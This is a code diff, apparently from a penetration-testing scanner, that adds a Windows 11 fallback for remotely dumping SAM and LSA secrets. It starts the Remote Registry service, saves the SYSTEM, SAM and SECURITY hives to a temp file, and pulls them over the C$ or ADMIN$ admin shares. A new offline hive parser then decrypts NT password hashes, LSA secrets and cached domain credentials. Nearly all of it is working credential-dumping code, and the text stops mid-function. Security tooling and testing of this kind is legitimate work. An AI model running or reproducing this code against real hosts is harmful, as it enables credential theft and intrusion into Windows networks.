### PR TITLE
Fix SAMDUMP/LSADUMP on Windows 11

### DIFF
--- a/internal/pentest/smb/lsadump.go
+++ b/internal/pentest/smb/lsadump.go
@@ -3,7 +3,6 @@ package smb
 import (
 	"context"
 	"fmt"
-	"strings"
 	"time"
 
 	smbfern "github.com/Method-Security/networkscan/generated/go/pentest/smb"
@@ -53,7 +52,9 @@ func PerformLsadump(ctx context.Context, target string, config *smbfern.PentestS
 	return result, nil
 }
 
-// performLsaDumpOperation performs the actual LSA dumping operations
+// performLsaDumpOperation performs the actual LSA dumping operations.
+// It first tries direct remote registry reads, then falls back to
+// RegSaveKey (save hive → download → parse offline) for Windows 11+ compatibility.
 func performLsaDumpOperation(ctx context.Context, host string, port int, authenticatedSession *gosmb.Connection, timeout int) (
 	[]*smbfern.LsaSecret, []string) {
 
@@ -73,15 +74,18 @@ func performLsaDumpOperation(ctx context.Context, host string, port int, authent
 	// Open the winreg pipe for DCE/RPC communication through IPC$ share
 	f, err := session.OpenFile("IPC$", msrrp.MSRRPPipe)
 	if err != nil {
-		// Check if the pipe is not available and retry (like go-secdump does)
-		if strings.Contains(err.Error(), "Pipe not available") {
-			log.Info("Winreg pipe not available, waiting 2 seconds and retrying (might trigger service start)")
+		// Winreg pipe not available — try starting the Remote Registry service via SVCCTL
+		log.Info("Winreg pipe not available, attempting to start Remote Registry service",
+			svc1log.SafeParam("error", err.Error()))
+		_, startErr := smbclient.EnsureRemoteRegistryStarted(ctx, session)
+		if startErr != nil {
+			log.Info("Failed to start Remote Registry service", svc1log.SafeParam("error", startErr.Error()))
+		} else {
 			time.Sleep(2 * time.Second)
-			f, err = session.OpenFile("IPC$", msrrp.MSRRPPipe)
 		}
-
+		f, err = session.OpenFile("IPC$", msrrp.MSRRPPipe)
 		if err != nil {
-			errors = append(errors, fmt.Sprintf("Failed to open winreg pipe: %v", err))
+			errors = append(errors, fmt.Sprintf("Failed to open winreg pipe (even after starting service): %v", err))
 			return lsaResults, errors
 		}
 	}
@@ -105,16 +109,38 @@ func performLsaDumpOperation(ctx context.Context, host string, port int, authent
 	}
 	defer func() { _ = rpccon.CloseKeyHandle(hklm) }()
 
-	// Extract LSA secrets using real go-secdump implementation
+	// Try direct remote registry read first
 	lsaSecrets, lsaErrors, err := smbclient.DumpLSASecrets(ctx, rpccon, hklm, false)
-	if err != nil {
-		errors = append(errors, fmt.Sprintf("LSA dump failed: %v", err))
-	} else {
-		lsaResults = lsaSecrets
-		errors = append(errors, lsaErrors...)
+	if err == nil && len(lsaSecrets) > 0 {
+		log.Info("LSA dump via direct registry read succeeded",
+			svc1log.SafeParam("lsaSecrets", len(lsaSecrets)))
+		return lsaSecrets, lsaErrors
 	}
 
-	log.Info("LSA dump operation completed",
+	// Direct approach failed — fall back to RegSaveKey (save hive, download, parse offline)
+	log.Info("Direct registry read failed, falling back to RegSaveKey approach",
+		svc1log.SafeParam("directError", fmt.Sprintf("%v", err)))
+
+	systemData, err := smbclient.SaveAndDownloadHive(ctx, session, rpccon, hklm, "SYSTEM")
+	if err != nil {
+		errors = append(errors, fmt.Sprintf("RegSaveKey fallback: failed to save SYSTEM hive: %v", err))
+		return lsaResults, errors
+	}
+
+	securityData, err := smbclient.SaveAndDownloadHive(ctx, session, rpccon, hklm, "SECURITY")
+	if err != nil {
+		errors = append(errors, fmt.Sprintf("RegSaveKey fallback: failed to save SECURITY hive: %v", err))
+		return lsaResults, errors
+	}
+
+	lsaResults, offlineErrors, err := smbclient.DumpLSAFromHives(ctx, systemData, securityData)
+	if err != nil {
+		errors = append(errors, fmt.Sprintf("RegSaveKey fallback: offline LSA parse failed: %v", err))
+		return lsaResults, errors
+	}
+	errors = append(errors, offlineErrors...)
+
+	log.Info("LSA dump via RegSaveKey completed",
 		svc1log.SafeParam("lsaSecrets", len(lsaResults)))
 
 	return lsaResults, errors

--- a/internal/pentest/smb/samdump.go
+++ b/internal/pentest/smb/samdump.go
@@ -3,7 +3,6 @@ package smb
 import (
 	"context"
 	"fmt"
-	"strings"
 	"time"
 
 	smbfern "github.com/Method-Security/networkscan/generated/go/pentest/smb"
@@ -53,7 +52,9 @@ func PerformSamdump(ctx context.Context, target string, config *smbfern.PentestS
 	return result, nil
 }
 
-// performSamDumpOperation performs the actual SAM dumping operations
+// performSamDumpOperation performs the actual SAM dumping operations.
+// It first tries direct remote registry reads, then falls back to
+// RegSaveKey (save hive → download → parse offline) for Windows 11+ compatibility.
 func performSamDumpOperation(ctx context.Context, host string, port int, authenticatedSession *gosmb.Connection, timeout int) (
 	[]*smbfern.SamSecret, []string) {
 
@@ -73,15 +74,18 @@ func performSamDumpOperation(ctx context.Context, host string, port int, authent
 	// Open the winreg pipe for DCE/RPC communication through IPC$ share
 	f, err := session.OpenFile("IPC$", msrrp.MSRRPPipe)
 	if err != nil {
-		// Check if the pipe is not available and retry (like go-secdump does)
-		if strings.Contains(err.Error(), "Pipe not available") {
-			log.Info("Winreg pipe not available, waiting 2 seconds and retrying (might trigger service start)")
+		// Winreg pipe not available — try starting the Remote Registry service via SVCCTL
+		log.Info("Winreg pipe not available, attempting to start Remote Registry service",
+			svc1log.SafeParam("error", err.Error()))
+		_, startErr := smbclient.EnsureRemoteRegistryStarted(ctx, session)
+		if startErr != nil {
+			log.Info("Failed to start Remote Registry service", svc1log.SafeParam("error", startErr.Error()))
+		} else {
 			time.Sleep(2 * time.Second)
-			f, err = session.OpenFile("IPC$", msrrp.MSRRPPipe)
 		}
-
+		f, err = session.OpenFile("IPC$", msrrp.MSRRPPipe)
 		if err != nil {
-			errors = append(errors, fmt.Sprintf("Failed to open winreg pipe: %v", err))
+			errors = append(errors, fmt.Sprintf("Failed to open winreg pipe (even after starting service): %v", err))
 			return samResults, errors
 		}
 	}
@@ -105,16 +109,38 @@ func performSamDumpOperation(ctx context.Context, host string, port int, authent
 	}
 	defer func() { _ = rpccon.CloseKeyHandle(hklm) }()
 
-	// Extract SAM secrets using real go-secdump implementation
+	// Try direct remote registry read first
 	samSecrets, samErrors, err := smbclient.DumpSAM(ctx, rpccon, hklm, false)
-	if err != nil {
-		errors = append(errors, fmt.Sprintf("SAM dump failed: %v", err))
-	} else {
-		samResults = samSecrets
-		errors = append(errors, samErrors...)
+	if err == nil && len(samSecrets) > 0 {
+		log.Info("SAM dump via direct registry read succeeded",
+			svc1log.SafeParam("samSecrets", len(samSecrets)))
+		return samSecrets, samErrors
 	}
 
-	log.Info("SAM dump operation completed",
+	// Direct approach failed — fall back to RegSaveKey (save hive, download, parse offline)
+	log.Info("Direct registry read failed, falling back to RegSaveKey approach",
+		svc1log.SafeParam("directError", fmt.Sprintf("%v", err)))
+
+	systemData, err := smbclient.SaveAndDownloadHive(ctx, session, rpccon, hklm, "SYSTEM")
+	if err != nil {
+		errors = append(errors, fmt.Sprintf("RegSaveKey fallback: failed to save SYSTEM hive: %v", err))
+		return samResults, errors
+	}
+
+	samData, err := smbclient.SaveAndDownloadHive(ctx, session, rpccon, hklm, "SAM")
+	if err != nil {
+		errors = append(errors, fmt.Sprintf("RegSaveKey fallback: failed to save SAM hive: %v", err))
+		return samResults, errors
+	}
+
+	samResults, offlineErrors, err := smbclient.DumpSAMFromHives(ctx, systemData, samData)
+	if err != nil {
+		errors = append(errors, fmt.Sprintf("RegSaveKey fallback: offline SAM parse failed: %v", err))
+		return samResults, errors
+	}
+	errors = append(errors, offlineErrors...)
+
+	log.Info("SAM dump via RegSaveKey completed",
 		svc1log.SafeParam("samSecrets", len(samResults)))
 
 	return samResults, errors

--- a/internal/protocol/smb/regf.go
+++ b/internal/protocol/smb/regf.go
@@ -1,0 +1,346 @@
+package smb
+
+import (
+	"encoding/binary"
+	"fmt"
+	"strings"
+)
+
+// Minimal Windows registry hive (regf) file parser for offline SAM/LSA extraction.
+// Supports navigating key hierarchy, reading values, class names, and listing subkeys.
+
+const (
+	regfMagic   = 0x66676572 // "regf"
+	regfHdrSize = 0x1000     // 4096 byte file header
+	nkSig       = 0x6B6E     // "nk"
+	vkSig       = 0x6B76     // "vk"
+	lfSig       = 0x666C     // "lf"
+	lhSig       = 0x686C     // "lh"
+	riSig       = 0x6972     // "ri"
+	liSig       = 0x696C     // "li"
+	nkCompName  = 0x0020     // key name is ASCII-compressed
+	vkCompName  = 0x0001     // value name is ASCII-compressed
+)
+
+// RegistryHive represents a parsed registry hive file.
+type RegistryHive struct {
+	data       []byte
+	rootOffset uint32
+}
+
+// HiveKey represents a key node (NK record) in the hive.
+type HiveKey struct {
+	hive          *RegistryHive
+	offset        uint32
+	flags         uint16
+	numSubkeys    uint32
+	subkeysOffset uint32
+	numValues     uint32
+	valuesOffset  uint32
+	classOffset   uint32
+	classLen      uint16
+	Name          string
+}
+
+// HiveValue represents a value node (VK record) in the hive.
+type HiveValue struct {
+	Name     string
+	DataType uint32
+	Data     []byte
+}
+
+// ParseRegistryHive parses raw bytes as a Windows registry hive file.
+func ParseRegistryHive(data []byte) (*RegistryHive, error) {
+	if len(data) < regfHdrSize+32 {
+		return nil, fmt.Errorf("data too small for registry hive (%d bytes)", len(data))
+	}
+	sig := binary.LittleEndian.Uint32(data[0:4])
+	if sig != regfMagic {
+		return nil, fmt.Errorf("invalid regf signature: 0x%x", sig)
+	}
+	rootOffset := binary.LittleEndian.Uint32(data[0x24:0x28])
+	return &RegistryHive{data: data, rootOffset: rootOffset}, nil
+}
+
+// cellData returns the file offset of a cell's content (skipping the 4-byte size field).
+// All cell offsets in regf are relative to the start of the hive bins area (file offset 0x1000).
+func (h *RegistryHive) cellData(offset uint32) int {
+	return int(offset) + regfHdrSize + 4
+}
+
+// RootKey returns the root key of the hive.
+func (h *RegistryHive) RootKey() (*HiveKey, error) {
+	return h.readKey(h.rootOffset)
+}
+
+func (h *RegistryHive) readKey(offset uint32) (*HiveKey, error) {
+	pos := h.cellData(offset)
+	if pos+0x4C > len(h.data) {
+		return nil, fmt.Errorf("key node out of bounds at offset 0x%x", offset)
+	}
+	sig := binary.LittleEndian.Uint16(h.data[pos : pos+2])
+	if sig != nkSig {
+		return nil, fmt.Errorf("expected nk signature at 0x%x, got 0x%x", pos, sig)
+	}
+	k := &HiveKey{hive: h, offset: offset}
+	k.flags = binary.LittleEndian.Uint16(h.data[pos+2 : pos+4])
+	k.numSubkeys = binary.LittleEndian.Uint32(h.data[pos+0x14 : pos+0x18])
+	k.subkeysOffset = binary.LittleEndian.Uint32(h.data[pos+0x1C : pos+0x20])
+	k.numValues = binary.LittleEndian.Uint32(h.data[pos+0x24 : pos+0x28])
+	k.valuesOffset = binary.LittleEndian.Uint32(h.data[pos+0x28 : pos+0x2C])
+	k.classOffset = binary.LittleEndian.Uint32(h.data[pos+0x30 : pos+0x34])
+	nameLen := int(binary.LittleEndian.Uint16(h.data[pos+0x48 : pos+0x4A]))
+	k.classLen = binary.LittleEndian.Uint16(h.data[pos+0x4A : pos+0x4C])
+	if pos+0x4C+nameLen > len(h.data) {
+		return nil, fmt.Errorf("key name extends past data")
+	}
+	nameBytes := h.data[pos+0x4C : pos+0x4C+nameLen]
+	if k.flags&nkCompName != 0 {
+		k.Name = string(nameBytes) // ASCII
+	} else {
+		k.Name = decodeUTF16LE(nameBytes)
+	}
+	return k, nil
+}
+
+// ClassName returns the class name of this key (used for boot key extraction).
+func (k *HiveKey) ClassName() string {
+	if k.classLen == 0 || k.classOffset == 0xFFFFFFFF {
+		return ""
+	}
+	pos := k.hive.cellData(k.classOffset)
+	end := pos + int(k.classLen)
+	if end > len(k.hive.data) {
+		return ""
+	}
+	raw := k.hive.data[pos:end]
+	// Class names are typically stored as UTF-16LE
+	if len(raw)%2 == 0 && len(raw) >= 2 {
+		decoded := decodeUTF16LE(raw)
+		if decoded != "" {
+			return decoded
+		}
+	}
+	return string(raw)
+}
+
+// Subkeys returns all subkeys of this key.
+func (k *HiveKey) Subkeys() ([]*HiveKey, error) {
+	if k.numSubkeys == 0 {
+		return nil, nil
+	}
+	return k.hive.readSubkeyList(k.subkeysOffset)
+}
+
+func (h *RegistryHive) readSubkeyList(offset uint32) ([]*HiveKey, error) {
+	pos := h.cellData(offset)
+	if pos+4 > len(h.data) {
+		return nil, fmt.Errorf("subkey list out of bounds at 0x%x", offset)
+	}
+	sig := binary.LittleEndian.Uint16(h.data[pos : pos+2])
+	count := int(binary.LittleEndian.Uint16(h.data[pos+2 : pos+4]))
+	var keys []*HiveKey
+	switch sig {
+	case lfSig, lhSig:
+		// Array of (offset, hash/hint) pairs, 8 bytes each
+		for i := 0; i < count; i++ {
+			ep := pos + 4 + i*8
+			if ep+4 > len(h.data) {
+				break
+			}
+			keyOff := binary.LittleEndian.Uint32(h.data[ep : ep+4])
+			key, err := h.readKey(keyOff)
+			if err != nil {
+				continue
+			}
+			keys = append(keys, key)
+		}
+	case riSig:
+		// Array of offsets to other subkey lists
+		for i := 0; i < count; i++ {
+			ep := pos + 4 + i*4
+			if ep+4 > len(h.data) {
+				break
+			}
+			listOff := binary.LittleEndian.Uint32(h.data[ep : ep+4])
+			sub, err := h.readSubkeyList(listOff)
+			if err != nil {
+				continue
+			}
+			keys = append(keys, sub...)
+		}
+	case liSig:
+		// Array of offsets directly to key nodes
+		for i := 0; i < count; i++ {
+			ep := pos + 4 + i*4
+			if ep+4 > len(h.data) {
+				break
+			}
+			keyOff := binary.LittleEndian.Uint32(h.data[ep : ep+4])
+			key, err := h.readKey(keyOff)
+			if err != nil {
+				continue
+			}
+			keys = append(keys, key)
+		}
+	default:
+		return nil, fmt.Errorf("unknown subkey list type: 0x%x", sig)
+	}
+	return keys, nil
+}
+
+// OpenSubKey navigates a backslash-separated path from this key.
+func (k *HiveKey) OpenSubKey(path string) (*HiveKey, error) {
+	parts := strings.Split(path, `\`)
+	current := k
+	for _, part := range parts {
+		if part == "" {
+			continue
+		}
+		subkeys, err := current.Subkeys()
+		if err != nil {
+			return nil, fmt.Errorf("failed to list subkeys of %q: %v", current.Name, err)
+		}
+		found := false
+		for _, sk := range subkeys {
+			if strings.EqualFold(sk.Name, part) {
+				current = sk
+				found = true
+				break
+			}
+		}
+		if !found {
+			return nil, fmt.Errorf("subkey %q not found under %q", part, current.Name)
+		}
+	}
+	return current, nil
+}
+
+// Values returns all values of this key.
+func (k *HiveKey) Values() ([]*HiveValue, error) {
+	if k.numValues == 0 {
+		return nil, nil
+	}
+	pos := k.hive.cellData(k.valuesOffset)
+	var values []*HiveValue
+	for i := uint32(0); i < k.numValues; i++ {
+		ep := pos + int(i)*4
+		if ep+4 > len(k.hive.data) {
+			break
+		}
+		valOff := binary.LittleEndian.Uint32(k.hive.data[ep : ep+4])
+		val, err := k.hive.readValue(valOff)
+		if err != nil {
+			continue
+		}
+		values = append(values, val)
+	}
+	return values, nil
+}
+
+// GetValue returns a named value, or error if not found.
+func (k *HiveKey) GetValue(name string) (*HiveValue, error) {
+	values, err := k.Values()
+	if err != nil {
+		return nil, err
+	}
+	for _, v := range values {
+		if strings.EqualFold(v.Name, name) {
+			return v, nil
+		}
+	}
+	return nil, fmt.Errorf("value %q not found in key %q", name, k.Name)
+}
+
+// GetDefaultValue returns the unnamed default value of this key.
+func (k *HiveKey) GetDefaultValue() (*HiveValue, error) {
+	values, err := k.Values()
+	if err != nil {
+		return nil, err
+	}
+	for _, v := range values {
+		if v.Name == "" {
+			return v, nil
+		}
+	}
+	return nil, fmt.Errorf("default value not found in key %q", k.Name)
+}
+
+// GetValueDWORD reads a DWORD value and returns it as uint32.
+func (k *HiveKey) GetValueDWORD(name string) (uint32, error) {
+	v, err := k.GetValue(name)
+	if err != nil {
+		return 0, err
+	}
+	if len(v.Data) < 4 {
+		return 0, fmt.Errorf("DWORD value %q too short: %d bytes", name, len(v.Data))
+	}
+	return binary.LittleEndian.Uint32(v.Data[:4]), nil
+}
+
+// GetValueString reads a REG_SZ or REG_EXPAND_SZ value as a Go string.
+func (k *HiveKey) GetValueString(name string) (string, error) {
+	v, err := k.GetValue(name)
+	if err != nil {
+		return "", err
+	}
+	if len(v.Data) < 2 {
+		return "", nil
+	}
+	return decodeUTF16LE(v.Data), nil
+}
+
+func (h *RegistryHive) readValue(offset uint32) (*HiveValue, error) {
+	pos := h.cellData(offset)
+	if pos+0x14 > len(h.data) {
+		return nil, fmt.Errorf("value node out of bounds at 0x%x", offset)
+	}
+	sig := binary.LittleEndian.Uint16(h.data[pos : pos+2])
+	if sig != vkSig {
+		return nil, fmt.Errorf("expected vk signature at 0x%x, got 0x%x", pos, sig)
+	}
+	nameLen := int(binary.LittleEndian.Uint16(h.data[pos+2 : pos+4]))
+	dataLen := binary.LittleEndian.Uint32(h.data[pos+4 : pos+8])
+	dataOffOrInline := binary.LittleEndian.Uint32(h.data[pos+8 : pos+0xC])
+	dataType := binary.LittleEndian.Uint32(h.data[pos+0xC : pos+0x10])
+	flags := binary.LittleEndian.Uint16(h.data[pos+0x10 : pos+0x12])
+
+	v := &HiveValue{DataType: dataType}
+
+	// Parse name
+	if nameLen > 0 {
+		nameEnd := pos + 0x14 + nameLen
+		if nameEnd > len(h.data) {
+			return nil, fmt.Errorf("value name extends past data")
+		}
+		nameBytes := h.data[pos+0x14 : nameEnd]
+		if flags&vkCompName != 0 {
+			v.Name = string(nameBytes) // ASCII
+		} else {
+			v.Name = decodeUTF16LE(nameBytes)
+		}
+	}
+
+	// Parse data
+	if dataLen&0x80000000 != 0 {
+		// Resident data: stored inline in the data offset field (≤4 bytes)
+		actualLen := dataLen & 0x7FFFFFFF
+		if actualLen > 4 {
+			actualLen = 4
+		}
+		buf := make([]byte, 4)
+		binary.LittleEndian.PutUint32(buf, dataOffOrInline)
+		v.Data = make([]byte, actualLen)
+		copy(v.Data, buf[:actualLen])
+	} else if dataLen > 0 {
+		dataPos := h.cellData(dataOffOrInline)
+		end := dataPos + int(dataLen)
+		if end > len(h.data) {
+			return nil, fmt.Errorf("value data extends past hive (offset 0x%x, len %d)", dataOffOrInline, dataLen)
+		}
+		v.Data = make([]byte, dataLen)
+		copy(v.Data, h.data[dataPos:end])
+	}
+
+	return v, nil
+}

--- a/internal/protocol/smb/savedump.go
+++ b/internal/protocol/smb/savedump.go
@@ -79,6 +79,13 @@ func SaveAndDownloadHive(ctx context.Context, session *gosmb.Connection, rpccon 
 	}
 
 	if downloadErr != nil {
+		// Best-effort cleanup: try to delete the temp file through each share
+		for _, share := range shares {
+			if delErr := session.DeleteFile(share.name, share.path); delErr == nil {
+				log.Info("Cleaned up temp hive file after download failure", svc1log.SafeParam("share", share.name))
+				break
+			}
+		}
 		return nil, fmt.Errorf("failed to download %s hive from all shares: %v", hiveName, downloadErr)
 	}
 
@@ -592,7 +599,7 @@ func getLSAKeyFromHive(securityHive *RegistryHive, bootKey []byte) ([]byte, bool
 }
 
 func parseSecretFromHive(systemHive *RegistryHive, name string, secretItem []byte) *PrintableLSASecret {
-	if len(secretItem) == 0 {
+	if len(secretItem) < 2 {
 		return nil
 	}
 	if bytes.Equal(secretItem[:2], []byte{0, 0}) {
@@ -736,7 +743,7 @@ func getCachedHashesFromHive(ctx context.Context, securityHive *RegistryHive, bo
 			if len(v.Data) >= 4 {
 				ic := binary.LittleEndian.Uint32(v.Data[:4])
 				if ic > 10240 {
-					iterCount = int(ic)
+					iterCount = int(ic & 0xfffffc00)
 				} else if ic != 0 {
 					iterCount = int(ic) * 1024
 				}

--- a/internal/protocol/smb/savedump.go
+++ b/internal/protocol/smb/savedump.go
@@ -1,0 +1,872 @@
+package smb
+
+import (
+	"bytes"
+	"context"
+	"crypto/md5"
+	"crypto/rc4"
+	"encoding/binary"
+	"encoding/hex"
+	"fmt"
+	"strings"
+	"time"
+
+	smbfern "github.com/Method-Security/networkscan/generated/go/pentest/smb"
+	"github.com/Method-Security/networkscan/internal/common/ntlm"
+	gosmb "github.com/jfjallid/go-smb/smb"
+	"github.com/jfjallid/go-smb/smb/dcerpc/msrrp"
+	"github.com/jfjallid/go-smb/smb/encoder"
+	svc1log "github.com/palantir/witchcraft-go-logging/wlog/svclog/svc1log"
+	"golang.org/x/crypto/md4"
+)
+
+// SaveAndDownloadHive saves a registry hive to a temp file on the target via RegSaveKey,
+// downloads it over SMB, then cleans up. This works on Windows 11+ where direct
+// remote registry reads of SAM/SECURITY are blocked.
+func SaveAndDownloadHive(ctx context.Context, session *gosmb.Connection, rpccon *msrrp.RPCCon, hklm []byte, hiveName string) ([]byte, error) {
+	log := svc1log.FromContext(ctx)
+
+	// Open the top-level hive key (e.g. "SAM", "SYSTEM", "SECURITY")
+	hSubKey, err := rpccon.OpenSubKeyExt(hklm, hiveName, msrrp.RegOptionBackupRestore, msrrp.PermMaximumAllowed)
+	if err != nil {
+		hSubKey, err = rpccon.OpenSubKey(hklm, hiveName)
+		if err != nil {
+			return nil, fmt.Errorf("failed to open %s key: %v", hiveName, err)
+		}
+	}
+	defer func() { _ = rpccon.CloseKeyHandle(hSubKey) }()
+
+	// Generate unique temp filename
+	tempName := fmt.Sprintf("ns%08x.tmp", uint32(time.Now().UnixNano()))
+	tempPath := fmt.Sprintf(`C:\Windows\Temp\%s`, tempName)
+
+	log.Info("Saving registry hive via RegSaveKey",
+		svc1log.SafeParam("hive", hiveName),
+		svc1log.SafeParam("tempPath", tempPath))
+
+	err = rpccon.RegSaveKey(hSubKey, tempPath, "")
+	if err != nil {
+		return nil, fmt.Errorf("RegSaveKey failed for %s: %v", hiveName, err)
+	}
+
+	// Download via SMB admin share and clean up
+	var hiveData []byte
+	var downloadErr error
+
+	// Try C$ first, then ADMIN$
+	shares := []struct {
+		name string
+		path string
+	}{
+		{"C$", fmt.Sprintf(`Windows\Temp\%s`, tempName)},
+		{"ADMIN$", fmt.Sprintf(`Temp\%s`, tempName)},
+	}
+
+	for _, share := range shares {
+		var buf bytes.Buffer
+		downloadErr = session.RetrieveFile(share.name, share.path, 0, func(data []byte) (int, error) {
+			return buf.Write(data)
+		})
+		if downloadErr == nil {
+			hiveData = buf.Bytes()
+			// Delete temp file through same share
+			_ = session.DeleteFile(share.name, share.path)
+			break
+		}
+		log.Info("Failed to download hive via share, trying next",
+			svc1log.SafeParam("share", share.name),
+			svc1log.SafeParam("error", downloadErr.Error()))
+	}
+
+	if downloadErr != nil {
+		return nil, fmt.Errorf("failed to download %s hive from all shares: %v", hiveName, downloadErr)
+	}
+
+	log.Info("Downloaded registry hive",
+		svc1log.SafeParam("hive", hiveName),
+		svc1log.SafeParam("size", len(hiveData)))
+
+	return hiveData, nil
+}
+
+// DumpSAMFromHives extracts SAM secrets from downloaded SYSTEM and SAM hive files.
+func DumpSAMFromHives(ctx context.Context, systemData, samData []byte) ([]*smbfern.SamSecret, []string, error) {
+	log := svc1log.FromContext(ctx)
+	var results []*smbfern.SamSecret
+	var errors []string
+
+	systemHive, err := ParseRegistryHive(systemData)
+	if err != nil {
+		return nil, nil, fmt.Errorf("failed to parse SYSTEM hive: %v", err)
+	}
+	samHive, err := ParseRegistryHive(samData)
+	if err != nil {
+		return nil, nil, fmt.Errorf("failed to parse SAM hive: %v", err)
+	}
+
+	bootKey, err := getBootKeyFromHive(systemHive)
+	if err != nil {
+		return nil, nil, fmt.Errorf("failed to extract boot key: %v", err)
+	}
+	log.Info("Extracted boot key from SYSTEM hive", svc1log.SafeParam("keyLen", len(bootKey)))
+
+	sysKey, err := getSysKeyFromHive(samHive, bootKey)
+	if err != nil {
+		return nil, nil, fmt.Errorf("failed to extract syskey: %v", err)
+	}
+	log.Info("Extracted syskey from SAM hive")
+
+	// Determine OS build for hash format detection
+	osBuild := getOSBuildFromHive(systemHive)
+
+	samRoot, err := samHive.RootKey()
+	if err != nil {
+		return nil, nil, err
+	}
+
+	usersKey, err := samRoot.OpenSubKey(`SAM\Domains\Account\Users`)
+	if err != nil {
+		return nil, nil, fmt.Errorf("failed to open Users key: %v", err)
+	}
+
+	subkeys, err := usersKey.Subkeys()
+	if err != nil {
+		return nil, nil, err
+	}
+
+	for _, sk := range subkeys {
+		if strings.EqualFold(sk.Name, "Names") {
+			continue
+		}
+		ridBytes, err := hex.DecodeString(sk.Name)
+		if err != nil {
+			continue
+		}
+		if len(ridBytes) != 4 {
+			continue
+		}
+		rid := binary.BigEndian.Uint32(ridBytes)
+
+		vVal, err := sk.GetValue("V")
+		if err != nil {
+			errors = append(errors, fmt.Sprintf("Failed to read V for RID %d: %v", rid, err))
+			continue
+		}
+		data := vVal.Data
+		if len(data) < 0xCC {
+			errors = append(errors, fmt.Sprintf("V value too short for RID %d", rid))
+			continue
+		}
+
+		offsetName := binary.LittleEndian.Uint32(data[0x0c:]) + 0xcc
+		szName := binary.LittleEndian.Uint32(data[0x10:])
+		if int(offsetName+szName) > len(data) {
+			continue
+		}
+		username, err := encoder.FromUnicodeString(data[offsetName : offsetName+szName])
+		if err != nil {
+			continue
+		}
+
+		samSecret := &smbfern.SamSecret{
+			Username: username,
+			Rid:      int(rid),
+		}
+
+		szNT := binary.LittleEndian.Uint32(data[0xac:])
+		offsetHashStruct := binary.LittleEndian.Uint32(data[0xa8:]) + 0xcc
+
+		if szNT == 0 {
+			samSecret.NtHash = "<empty>"
+			lmHash := "<empty>"
+			samSecret.LmHash = &lmHash
+			results = append(results, samSecret)
+			continue
+		}
+
+		var encHash, iv []byte
+		var useAES bool
+
+		if osBuild < 14393 && szNT == 0x14 {
+			offsetNTHash := offsetHashStruct + 4
+			if int(offsetNTHash+16) > len(data) {
+				continue
+			}
+			encHash = data[offsetNTHash : offsetNTHash+16]
+			useAES = false
+		} else if osBuild >= 14393 {
+			if szNT == 0x14 {
+				offsetNTHash := offsetHashStruct + 4
+				if int(offsetNTHash+16) > len(data) {
+					continue
+				}
+				encHash = data[offsetNTHash : offsetNTHash+16]
+				useAES = false
+			} else if szNT == 0x38 {
+				offsetIV := offsetHashStruct + 8
+				offsetNTHash := offsetHashStruct + 24
+				if int(offsetNTHash+16) > len(data) || int(offsetIV+16) > len(data) {
+					continue
+				}
+				encHash = data[offsetNTHash : offsetNTHash+16]
+				iv = data[offsetIV : offsetIV+16]
+				useAES = true
+			} else {
+				samSecret.NtHash = "<empty>"
+				lmHash := "<empty>"
+				samSecret.LmHash = &lmHash
+				results = append(results, samSecret)
+				continue
+			}
+		} else {
+			continue
+		}
+
+		var hash []byte
+		if useAES {
+			hash, err = DecryptAESHash(encHash, iv, sysKey, rid)
+		} else {
+			hash, err = DecryptRC4Hash(encHash, sysKey, rid)
+		}
+		if err != nil {
+			errors = append(errors, fmt.Sprintf("Failed to decrypt hash for %s: %v", username, err))
+			continue
+		}
+
+		samSecret.NtHash = fmt.Sprintf("%x", hash)
+		lmHash := ntlm.StandardLMHash
+		samSecret.LmHash = &lmHash
+
+		results = append(results, samSecret)
+		log.Info("Extracted SAM hash (offline)",
+			svc1log.SafeParam("username", username),
+			svc1log.SafeParam("rid", rid))
+	}
+
+	return results, errors, nil
+}
+
+// DumpLSAFromHives extracts LSA secrets from downloaded SYSTEM and SECURITY hive files.
+func DumpLSAFromHives(ctx context.Context, systemData, securityData []byte) ([]*smbfern.LsaSecret, []string, error) {
+	log := svc1log.FromContext(ctx)
+	var results []*smbfern.LsaSecret
+	var errors []string
+
+	systemHive, err := ParseRegistryHive(systemData)
+	if err != nil {
+		return nil, nil, fmt.Errorf("failed to parse SYSTEM hive: %v", err)
+	}
+	securityHive, err := ParseRegistryHive(securityData)
+	if err != nil {
+		return nil, nil, fmt.Errorf("failed to parse SECURITY hive: %v", err)
+	}
+
+	bootKey, err := getBootKeyFromHive(systemHive)
+	if err != nil {
+		return nil, nil, fmt.Errorf("failed to extract boot key: %v", err)
+	}
+
+	lsaKey, vistaStyle, err := getLSAKeyFromHive(securityHive, bootKey)
+	if err != nil {
+		return nil, nil, fmt.Errorf("failed to extract LSA key: %v", err)
+	}
+
+	log.Info("Extracted LSA key from SECURITY hive",
+		svc1log.SafeParam("vistaStyle", vistaStyle),
+		svc1log.SafeParam("keyLen", len(lsaKey)))
+
+	// Extract secrets
+	secRoot, err := securityHive.RootKey()
+	if err != nil {
+		return nil, nil, err
+	}
+
+	secretsKey, err := secRoot.OpenSubKey(`Policy\Secrets`)
+	if err != nil {
+		errors = append(errors, fmt.Sprintf("Failed to open Secrets key: %v", err))
+		// Continue to try cached creds
+	} else {
+		secretSubkeys, err := secretsKey.Subkeys()
+		if err != nil {
+			errors = append(errors, fmt.Sprintf("Failed to list secrets: %v", err))
+		} else {
+			for _, sk := range secretSubkeys {
+				if sk.Name == "NL$Control" {
+					continue
+				}
+				currValKey, err := sk.OpenSubKey("CurrVal")
+				if err != nil {
+					continue
+				}
+				defVal, err := currValKey.GetDefaultValue()
+				if err != nil {
+					continue
+				}
+				value := defVal.Data
+				if len(value) == 0 || value[0] != 0x0 {
+					continue
+				}
+				if !vistaStyle {
+					continue
+				}
+
+				record := &lsaSecret{}
+				if err := record.unmarshal(value); err != nil {
+					continue
+				}
+				if len(record.EncryptedData) < 32 {
+					continue
+				}
+				tmpKey := SHA256(lsaKey, record.EncryptedData[:32], 0)
+				plainText, err := DecryptAES(tmpKey, record.EncryptedData[32:], nil)
+				if err != nil {
+					continue
+				}
+				record2 := &lsaSecretBlob{}
+				record2.unmarshal(plainText)
+
+				ps := parseSecretFromHive(systemHive, sk.Name, record2.Secret)
+				if ps == nil {
+					continue
+				}
+				results = appendLSASecret(results, ps, log, sk.Name)
+			}
+		}
+	}
+
+	// Extract cached domain credentials
+	cachedHashes := getCachedHashesFromHive(ctx, securityHive, bootKey, lsaKey, vistaStyle)
+	if len(cachedHashes) > 0 {
+		var entries []*smbfern.LsaSecretEntry
+		for _, h := range cachedHashes {
+			clean := strings.ReplaceAll(h, "\u0000", "")
+			if parts := strings.SplitN(clean, ":", 2); len(parts) == 2 {
